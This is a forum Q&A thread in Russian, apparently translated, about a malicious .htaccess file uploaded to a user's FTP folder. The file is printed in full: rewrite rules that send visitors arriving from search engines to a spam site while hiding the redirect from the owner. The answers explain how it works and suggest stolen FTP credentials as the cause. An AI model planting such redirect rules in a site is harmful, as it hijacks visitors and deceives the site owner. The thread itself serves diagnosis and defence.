Подозрительный .htaccess файл

20

Это было загружено в одну из моих папок FTP. Я не знаком с Apache, но все же любопытно - может кто-нибудь сказать мне, какой тип подлого действия пытается совершить этот файл? Благодарность!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2 security mod-rewrite .htaccess ovinophile
источник
1
ХОРОШИЙ! (Злобным способом ...) В основном отбирает всех, кто заходит на ваш сайт, из поисковой системы и перенаправляет их на SPAMMER.info
KPWINC
Если бы это случилось со мной однажды. .htaccessФайл , добавленный в мой сайт имел около 40 пустых строк в верхней части, просто запутать меня дальше.
TRiG

Ответы:

15

Это отправляет пользователей, которые приходят из поисковой системы на последний сайт SPAMMER.info(см. Историю вопроса для реального сайта).

Он ищет рефереров в попытке скрыться от вас , поскольку вы, вероятно, не заходите на сайт через поисковые системы. То есть, если вы идете по URL-адресу напрямую, все кажется нормальным. Однако, если вы заходите через поисковую систему, вы будете перенаправлены.

Примечание: это не влияет на веб-сканеры, так как они ( по крайней мере, googlebot ) не устанавливают заголовок реферера.

Майкл Харен
источник
8

Каждый раз, когда пользователь из поисковой системы попадает на любую страницу вашего сайта, он будет перенаправлен на спам-сайт .info.

Это очень подлый - вы не заметите ничего плохого, так как обычно просто вводите адрес.

Greg
источник
1
Поскольку он смотрит на реферера, не перенаправит ли он какие-либо клики, которые попадают в поисковую систему?
Разве это не влияет на ссылки из Google? Например, вы ищете сайт ОП в Google, нажимаете на него, и вы перенаправлены с тех пор, как пришли из Google?
Да, только ссылки с поисковых систем (как я уже сказал в своем ответе), но не поисковые роботы / боты. Этот ответ был обновлен, поэтому теперь он правильный. Первоначально указывалось, что это относится только к ботам.
Майкл Харен
1

чтобы добавить больше - скорее всего, ваши учетные данные ftp утекли. может быть, вы сохранили их в filezilla / total commander и т. д., существует множество вредоносных программ, которые крадут их, а затем «обходят» - входят в учетные записи ftp, присоединяют вредоносный javascript к index.php / html или помещают аналогичные файлы перезаписи.

PQD
источник
Я сталкиваюсь с этой проблемой. День за другим модифицируется файл .htaccess, что приводит к внутренней ошибке сервера.
vnix27